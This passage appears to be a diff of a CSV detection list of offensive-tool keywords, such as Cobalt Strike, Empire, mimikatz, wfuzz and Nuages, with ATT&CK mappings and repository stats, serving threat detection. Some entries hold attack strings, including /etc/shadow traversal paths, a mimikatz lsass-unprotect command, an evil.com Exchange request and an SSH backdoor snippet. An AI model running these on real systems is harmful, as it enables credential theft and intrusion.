Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* xpipe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","0","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" -"* Your payload has been delivered*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -z burplog*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -z file*wordlist/*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -z list*nonvalid-httpwatch --basic*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - 
TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -z range --zD 0-1 -u http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -z range*0-10 --hl 97 http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* Your payload has been delivered*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -z burplog*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -z file*wordlist/*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -z list*nonvalid-httpwatch --basic*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - 
TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -z range --zD 0-1 -u http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -z range*0-10 --hl 97 http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*!autoruns *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*!files upload *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*!handlers load *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*!implants *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*!interactive 
*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*!modules load *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" -"*!processprotect *lsass.exe*","offensive_tool_keyword","mimikatz","removing process protection for the lsass.exe process can potentially enable adversaries to inject malicious code or manipulate the process to escalate privileges or gather sensitive information such as credentials. command: !processprotect /process:lsass.exe /remove","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*!processprotect *lsass.exe*","offensive_tool_keyword","mimikatz","removing process protection for the lsass.exe process can potentially enable adversaries to inject malicious code or manipulate the process to escalate privileges or gather sensitive information such as credentials. 
command: !processprotect /process:lsass.exe /remove","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*!put */tmp*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*!shell *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*!tunnels --tcp*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*!use *aes256_py*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*!use *reflected_assembly*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" -"*!wPkgPath!*!ak!*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*$attacker_IPlist*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*!wPkgPath!*!ak!*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*$attacker_IPlist*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*$C2_SERVER*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" -"*$DummyServiceName*","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*$DummyServiceName*","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*$env:COMPlus_ETWEnabled=0*","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*$FilterArgs = @{ name='Notion'*EventNameSpace='root\\CimV2'*QueryLanguage=*WQL* Query=*SELECT * FROM __InstanceModificationE*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" -"*$KeePassBinaryPath*","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*$KeePassUser*","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*%APPDATA%/Indexing.*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. 
On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*$KeePassBinaryPath*","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*$KeePassUser*","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*%APPDATA%/Indexing.*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*%comspec% /k *.bat*","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - 
APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","0","N/A","10","10","23","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" "*&& cat /etc/motd*exec -a -$(basename $SHELL) $SHELL*","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" -"*(not launching GPOddity SMB server)*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*(not launching GPOddity SMB server)*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "**\Users\Public\termsrv.patch.dll*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*.*autodiscover\.json.*Powershell.*","offensive_tool_keyword","POC","forged request. 
exemple: autodiscover/autodiscover.json?@evil.com/&Email=autodiscover/autodiscover.json%3f@evil.com","T1190 - T1140 - T1564 - T1204 - T1505","TA0001 - TA0005","N/A","N/A","Exploitation tools","https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*../../../../../../etc/passwd*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*../../../../../../etc/shadow*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*../../../../../../etc/passwd*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*../../../../../../etc/shadow*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*./*octopus.py*","offensive_tool_keyword","octopus","Octopus is an open source. 
